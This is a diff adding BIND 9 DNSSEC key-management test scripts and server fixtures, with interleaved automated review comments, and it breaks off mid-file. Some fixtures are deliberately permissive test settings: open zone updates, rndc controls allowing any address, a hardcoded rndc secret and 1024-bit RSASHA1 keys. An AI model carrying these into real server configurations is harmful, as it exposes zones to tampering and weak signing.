@@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# a comment which should be skipped + +algorithm-policy rsasha1 { + key-size ksk 2048; + key-size zsk 1024; // this too +}; + +// and this + +policy default { + directory "keydir"; + algorithm rsasha1; + coverage 1y; # another comment + roll-period zsk 6mo; // and yet another + pre-publish zsk 6w; + post-publish zsk 6w; + keyttl 1h; +}; + +policy extra { + policy default; + coverage 5y; + roll-period KSK 1 year; + roll-period zsk 3mo; + pre-publish ksk 3mo; + post-publish zsk 1w; + keyttl 2h; +}; + +/* + * and this is also a comment, + * and it should be ignored like + * the others. + */ + +zone example.com { + policy extra; + coverage 5 mon; + algorithm nsec3rsasha1; +}; + +/* + * This confirms that zones starting with digits are accepted. + */ +zone "99example.com" { + policy global; +}; diff --git a/bin/tests/system/keymgr/setup.sh b/bin/tests/system/keymgr/setup.sh new file mode 100644 index 0000000..d7cef0c --- /dev/null +++ b/bin/tests/system/keymgr/setup.sh 
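Review bot: The `policy default` block pins `algorithm rsasha1` and the `algorithm-policy rsasha1` block gives the ZSK a 1024-bit key, yet nothing in the file says these values exist only to exercise the parser. Because the file is named `policy.sample` it reads like a template, while RSASHA1 is no longer a recommended signing algorithm and the built-in `global` policy printed in policy.good uses 2048-bit keys. I would add a header comment such as `# Parser test input only; the algorithms and key sizes here are not recommendations.`, which leaves the expected output in policy.good unchanged.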
@@ -0,0 +1,192 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +KEYGEN="$KEYGEN -q" + +# Test 1: KSK goes inactive before successor is active +dir=01-ksk-inactive +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 2: ZSK goes inactive before successor is active +dir=02-zsk-inactive +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 3: KSK is unpublished before its successor is published +dir=03-ksk-unpublished +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -D +6mo $ksk1 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 4: ZSK is unpublished before its successor is published +dir=04-zsk-unpublished +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +$SETTIME -K $dir -D +6mo $zsk1 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk 
example.com` + +# Test 5: KSK deleted and successor published before KSK is deactivated +# and successor activated. +dir=05-ksk-unpub-active +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +8mo $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 6: ZSK deleted and successor published before ZSK is deactivated +# and successor activated. +dir=06-zsk-unpub-active +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +8mo $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 7: KSK rolled with insufficient delay after prepublication. +dir=07-ksk-ttl +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -P +269d $ksk2 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 8: ZSK rolled with insufficient delay after prepublication. 
+dir=08-zsk-ttl +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $zsk2 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 9: No special preparation needed + +# Test 10: Valid key set, but rollover period has changed +dir=10-change-roll +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +3mo -D +4mo $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` + +# Test 11: Many keys all simultaneously scheduled to be active in the future +dir=11-many-simul +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk -P now+1mo -A now+1mo example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` + +# Test 12: Many keys all simultaneously scheduled to be active in the past +dir=12-many-active +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 13: Multiple simultaneous keys with no configured roll period +dir=13-noroll +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +k2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +k3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` 
+z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 14: Keys exist but have the wrong algorithm +dir=14-wrongalg +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -qfk example.com` +z1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -q example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 15: No zones specified; just search the directory for keys +dir=15-unspec +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 16: No zones specified; search the directory for keys; +# keys have the wrong algorithm for their policies +dir=16-wrongalg-unspec +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -qfk example.com` +z1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -q example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 17: Keys are simultaneously active but we run with no force +# flag (this should fail) +dir=17-noforce +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` 
+z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 18: Prepublication interval is set to a nonstandard value +dir=18-nonstd-prepub +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I now+2mo -D now+3mo $zsk1 > /dev/null + +# Test 19: Key has been published/active a long time +dir=19-old-keys +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -P now-2y -A now-2y $ksk1 > /dev/null +$SETTIME -K $dir -P now-2y -A now-2y $zsk1 > /dev/null + +copy_setports policy.conf.in policy.conf +copy_setports 18-nonstd-prepub/policy.conf.in 18-nonstd-prepub/policy.conf +copy_setports 19-old-keys/policy.conf.in 19-old-keys/policy.conf diff --git a/bin/tests/system/keymgr/testpolicy.py b/bin/tests/system/keymgr/testpolicy.py new file mode 100644 index 0000000..d63a079 --- /dev/null +++ b/bin/tests/system/keymgr/testpolicy.py 
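Review bot: Failures while building the key sets are silently discarded in this script: there is no `set -e`, the `$SETTIME` calls send their output to `/dev/null` (both streams in the earlier tests), and the backtick captures of `$KEYGEN` are never checked for an empty result. If one key generation fails, a later line such as `$KEYGEN -K $dir -S $ksk1` runs with an empty key name, and tests.sh then reports a coverage mismatch instead of a setup error. Consider adding `set -e` after sourcing conf.sh (keymgr2kasp/clean.sh in this commit already uses it; check that conf.sh tolerates it) and logging instead of discarding, e.g. `$SETTIME -K $dir -I +9mo -D +1y $ksk1 > $dir/settime.out 2>&1`.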
@@ -0,0 +1,39 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import sys +from isc import policy + +PP = policy.dnssec_policy() +# print the unmodified default and a generated zone policy +print(PP.named_policy["default"]) +print(PP.named_policy["global"]) +print(PP.policy("example.com")) + +if len(sys.argv) > 0: + for policy_file in sys.argv[1:]: + PP.load(policy_file) + + # now print the modified default and generated zone policies + print(PP.named_policy["default"]) + print(PP.policy("example.com")) + print(PP.policy("example.org")) + print(PP.policy("example.net")) + + # print algorithm policies + print(PP.alg_policy["RSASHA1"]) + print(PP.alg_policy["RSASHA256"]) + print(PP.alg_policy["ECDSAP256SHA256"]) + + # print another named policy + print(PP.named_policy["extra"]) +else: + print("ERROR: Please provide an input file") diff --git a/bin/tests/system/keymgr/tests.sh b/bin/tests/system/keymgr/tests.sh new file mode 100644 index 0000000..667277f --- /dev/null +++ b/bin/tests/system/keymgr/tests.sh 
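Review bot: `if len(sys.argv) > 0:` is always true because `sys.argv[0]` holds the script path, so the `else` branch that prints `ERROR: Please provide an input file` can never run. With no argument the loop over `sys.argv[1:]` loads nothing, and the later lookups for policies that only the input file defines, such as `PP.named_policy["extra"]`, would presumably fail with a lookup error instead of the intended message. The guard should be `if len(sys.argv) > 1:`.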
@@ -0,0 +1,146 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +matchall () { + match_result=ok + file=$1 + while IFS="," read expect matchline; do + [ -z "$matchline" ] && continue + matches=`grep "$matchline" $file | wc -l` + [ "$matches" -ne "$expect" ] && { + echo "'$matchline': expected $expect found $matches" + return 1 + } + done << EOF + $2 +EOF + return 0 +} + +echo_i "checking for DNSSEC key coverage issues" +ret=0 +for dir in [0-9][0-9]-*; do + ret=0 + echo_i "$dir ($n)" + kargs= cargs= kmatch= cmatch= kret= cret=0 warn= error= ok= + . $dir/expect + + # use policy.conf if available + policy="" + if [ -e "$dir/policy.conf" ]; then + policy="-c $dir/policy.conf" + if grep -e "-c policy.conf" $dir/expect > /dev/null + then + echo_i "fix $dir/expect: multiple policy files" + ret=1 + fi + else + policy="-c policy.conf" + fi + + # run keymgr to update keys + if [ "$CYGWIN" ]; then + $KEYMGR $policy -K $dir -g `cygpath -w $KEYGEN` \ + -s `cygpath -w $SETTIME` $kargs > keymgr.$n 2>&1 + else + $KEYMGR $policy -K $dir -g $KEYGEN \ + -s $SETTIME $kargs > keymgr.$n 2>&1 + fi + # check that return code matches expectations + found=$? + if [ $found -ne $kret ]; then + echo "keymgr retcode was $found expected $kret" + ret=1 + fi + + # check for matches in keymgr output + matchall keymgr.$n "$kmatch" || ret=1 + + # now check coverage + $COVERAGE -K $dir $cargs > coverage.$n 2>&1 + # check that return code matches expectations + found=$? 
+ if [ $found -ne $cret ]; then + echo "coverage retcode was $found expected $cret" + ret=1 + fi + + # check for correct number of errors + found=`grep ERROR coverage.$n | wc -l` + if [ $found -ne $error ]; then + echo "error count was $found expected $error" + ret=1 + fi + + # check for correct number of warnings + found=`grep WARNING coverage.$n | wc -l` + if [ $found -ne $warn ]; then + echo "warning count was $found expected $warn" + ret=1 + fi + + # check for correct number of OKs + found=`grep "No errors found" coverage.$n | wc -l` + if [ $found -ne $ok ]; then + echo "good count was $found expected $ok" + ret=1 + fi + + # check for matches in coverage output + matchall coverage.$n "$cmatch" || ret=1 + + if [ -f $dir/extra.sh ]; then + cd $dir + . ./extra.sh + cd .. + fi + + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "checking domains ending in . ($n)" +ret=0 +$KEYMGR -g $KEYGEN -s $SETTIME . > keymgr.1.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.1.$n | wc -l` +[ "$nkeys" -eq 2 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME . > keymgr.2.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.2.$n | wc -l` +[ "$nkeys" -eq 0 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME example.com. > keymgr.3.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.3.$n | wc -l` +[ "$nkeys" -eq 2 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME example.com. > keymgr.4.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.4.$n | wc -l` +[ "$nkeys" -eq 0 ] || ret=1 +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking policy.conf parser ($n)" +ret=0 +PYTHONPATH="../../../python:$PYTHONPATH" ${PYTHON} testpolicy.py policy.sample > policy.out +$DOS2UNIX policy.out > /dev/null 2>&1 +cmp -s policy.good policy.out || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
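Review bot: A missing expectation makes a check pass silently. The per-directory values are reset to empty strings (`kret= cret=0 warn= error= ok=`) and then compared unquoted, as in `[ $found -ne $kret ]`. If a `$dir/expect` file omits one of them, `[` fails with a syntax error, the `if` body is skipped and `ret` stays 0. Initialising them to numbers before sourcing `expect` (`kret=0 cret=0 warn=0 error=0 ok=0`) turns an omitted value into a real comparison. Separately, the "checking domains ending in ." block adds `$ret` to `status` without the `if [ $ret != 0 ]; then echo_i "failed"; fi` line the other blocks print.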
diff --git a/bin/tests/system/keymgr2kasp/README b/bin/tests/system/keymgr2kasp/README
new file mode 100644
index 0000000..f941209
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/README
@@ -0,0 +1,17 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The test setup for migrating to KASP tests.
+
+ns3 is an authoritative server for the various test domains.
+
+ns4 is an authoritative server that tests a specific case where zones
+using views migrate to dnssec-policy.
diff --git a/bin/tests/system/keymgr2kasp/clean.sh b/bin/tests/system/keymgr2kasp/clean.sh
new file mode 100644
index 0000000..1fe2bb9
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/clean.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f ns*/K*.private ns*/K*.key ns*/K*.state
+rm -f ns*/named.conf ns*/kasp.conf
+rm -f ns*/named.memstats ns*/named.run
+rm -f ns*/keygen.out* ns*/signer.out*
+rm -f ns*/zones
+rm -f ns*/dsset-*
+rm -f ns*/*.db ns*/*.db.jnl ns*/*.db.jbk
+rm -f ns*/*.db.signed* ns*/*.db.infile
+rm -f ns*/managed-keys.bind*
+rm -f ns*/*.mkeys*
+rm -f ./*.created
+rm -f ./created.key-*
+rm -f ./dig.out*
+rm -f ./python.out.*
+rm -f ./retired.*
+rm -f ./rndc.dnssec.*
+rm -f ./unused.key*
+rm -f ./verify.out.*
+
diff --git a/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in b/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in
new file mode 100644
index 0000000..0dae201
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "migrate" {
+ dnskey-ttl 7200;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "timing-metadata" {
+ dnskey-ttl 300;
+
+ signatures-refresh P1W;
+ signatures-validity P2W;
+ signatures-validity-dnskey P2W;
+
+ keys {
+ ksk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ // Together 12h
+ zone-propagation-delay 3600;
+ max-zone-ttl 11h;
+
+ // Together 3h
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
+
+/*
+ * This policy tests migration from existing keys with 1024 bits RSASHA1 keys
+ * to ECDSAP256SHA256 keys.
+ */
+dnssec-policy "migrate-nomatch-algnum" {
+ dnskey-ttl 300;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm ecdsa256;
+ zsk key-directory lifetime P60D algorithm ecdsa256;
+ };
+
+ // Together 12h
+ zone-propagation-delay 3600;
+ max-zone-ttl 11h;
+
+ // Together 3h
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
+
+/*
+ * This policy tests migration from existing keys with 2048 bits RSASHA256 keys
+ * to 3072 bits RSASHA256 keys.
+ */
+dnssec-policy "migrate-nomatch-alglen" {
+ dnskey-ttl 300;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm rsasha256 3072;
+ zsk key-directory lifetime P60D algorithm rsasha256 3072;
+ };
+
+ // Together 12h
+ zone-propagation-delay 3600;
+ max-zone-ttl 11h;
+
+ // Together 3h
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
diff --git a/bin/tests/system/keymgr2kasp/ns3/named.conf.in b/bin/tests/system/keymgr2kasp/ns3/named.conf.in
new file mode 100644
index 0000000..5a71a87
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns3/named.conf.in
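Review bot: The comment above `dnssec-policy "migrate-nomatch-algnum"` in kasp.conf.in says the existing keys are 1024 bits RSASHA1, but ns3/setup.sh in this commit creates that zone's keys with `-a RSASHA256 -b 2048` and its own comment calls them RSASHA256 keys. The comment should describe what the fixture actually generates, for example `* This policy tests migration from existing keys with 2048 bits RSASHA256 keys` followed by `* to ECDSAP256SHA256 keys.`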
@@ -0,0 +1,98 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* These are zones that migrate to dnssec-policy. */ +zone "migrate.kasp" { + type primary; + file "migrate.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "csk.kasp" { + type primary; + file "csk.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly no; +}; + +zone "csk-nosep.kasp" { + type primary; + file "csk-nosep.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly no; +}; + +zone "rumoured.kasp" { + type primary; + file "rumoured.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "omnipresent.kasp" { + type primary; + file "omnipresent.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "migrate-nomatch-algnum.kasp" { + type primary; + file "migrate-nomatch-algnum.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone 
"migrate-nomatch-alglen.kasp" { + type primary; + file "migrate-nomatch-alglen.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; diff --git a/bin/tests/system/keymgr2kasp/ns3/named2.conf.in b/bin/tests/system/keymgr2kasp/ns3/named2.conf.in new file mode 100644 index 0000000..8d5aecb --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/named2.conf.in 
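Review bot: The `csk.kasp` and `csk-nosep.kasp` zone blocks set `dnssec-dnskey-kskonly no;` but carry no `update-check-ksk` statement, whereas the comment in ns3/setup.sh describes the CSK zone as one that has `update-check-ksk no;` configured. Either add `update-check-ksk no;` to both blocks or correct the setup.sh comment, so the fixture and its description agree on which option the migration test depends on. A one-line comment next to `// NS3` stating that `allow-update { any; }`, `controls ... allow { any; }` and the fixed `rndc_key` secret are test-harness settings for the 10.53.0.3 listener would also keep the file from being reused as a template.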
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+include "kasp.conf";
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+/* These are zones that migrate to dnssec-policy. */
+zone "migrate.kasp" {
+ type primary;
+ file "migrate.kasp.db";
+ allow-update { any; };
+ dnssec-policy "migrate";
+};
+
+zone "csk.kasp" {
+ type primary;
+ file "csk.kasp.db";
+ allow-update { any; };
+ dnssec-policy "default";
+};
+
+zone "csk-nosep.kasp" {
+ type primary;
+ file "csk-nosep.kasp.db";
+ allow-update { any; };
+ dnssec-policy "default";
+};
+
+zone "rumoured.kasp" {
+ type primary;
+ file "rumoured.kasp.db";
+ allow-update { any; };
+ dnssec-policy "timing-metadata";
+};
+
+zone "omnipresent.kasp" {
+ type primary;
+ file "omnipresent.kasp.db";
+ allow-update { any; };
+ dnssec-policy "timing-metadata";
+};
+
+zone "migrate-nomatch-algnum.kasp" {
+ type primary;
+ file "migrate-nomatch-algnum.kasp.db";
+ allow-update { any; };
+ dnssec-policy "migrate-nomatch-algnum";
+};
+
+zone "migrate-nomatch-alglen.kasp" {
+ type primary;
+ file "migrate-nomatch-alglen.kasp.db";
+ allow-update { any; };
+ dnssec-policy "migrate-nomatch-alglen";
+};
diff --git a/bin/tests/system/keymgr2kasp/ns3/setup.sh b/bin/tests/system/keymgr2kasp/ns3/setup.sh new file mode 100644 index 0000000..6c1d0a5 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/setup.sh 
@@ -0,0 +1,131 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns3/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy. +setup migrate.kasp +echo "$zone" >> zones +ksktimes="-P now -A now -P sync now" +zsktimes="-P now -A now" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a 